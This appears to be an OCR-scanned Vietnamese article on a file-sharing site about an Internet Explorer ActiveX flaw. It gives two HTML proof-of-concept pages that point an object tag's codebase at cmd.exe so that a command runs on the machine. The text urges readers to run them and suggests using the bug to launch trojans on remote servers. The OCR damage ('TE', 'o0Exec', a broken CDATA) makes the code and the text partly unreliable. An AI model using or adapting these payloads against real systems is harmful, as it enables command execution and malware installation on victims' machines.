1. Trang chủ
  2. » Công Nghệ Thông Tin

Một lỗi của IE liên quan đến ActiveX

1 361 0
Tài liệu được quét OCR, nội dung có thể không chính xác
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Một Lỗi Của Te Liên Quan Đến Activex
Tác giả Lồ Lan
Trường học University of Information Technology
Chuyên ngành Computer Science
Thể loại Bài viết
Thành phố Hồ Chí Minh
Định dạng
Số trang 1
Dung lượng 25,5 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Một lỗi của IE liên quan đến ActiveX

Trang 1

Một lỗi của TE liên quan đến ActiveX :

trang này đã được đọc Lồ lan

Các bạn save và chạy đoạn html sau:

<html>

<body>

<span id="oSpan"> </span>

<script language="javascript" >

oSpan.innerHTML="<object classid=\"clsid:11111111-1111-1111-1111-111111111111\"

codebase=\"c:/winnt/system32/cmd.exe?/c+dir \"></object>";

</script>

</body>

</html>

hoặc

<html>

<body>

<span datasrc="#o0Exec" datafld="exploit" dataformatas="html"> </span>

<xml id="oExec">

<security>

<exploit>

<![CDATA

<object id="oFile"

classid="clsid:11111111-1111-1111-1111-111111111111"

codebase="c:/winnt/system32/cmd.exe?/c+dir" ></object>

]]>

</exploit>

</security>

</xml>

</body>

</html>

Tuy nó có hạn chế là ko chạy được thêm các parameters truyền vào, nhưng các bạn thử xem có

thể lợi dụng lỗi này để làm được nhiều việc rất có ích, như kích hoạt trojan ở remote server chẳng hạn

Thử demo ở đây hoặc đầy

Ngày đăng: 02/11/2012, 14:18

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w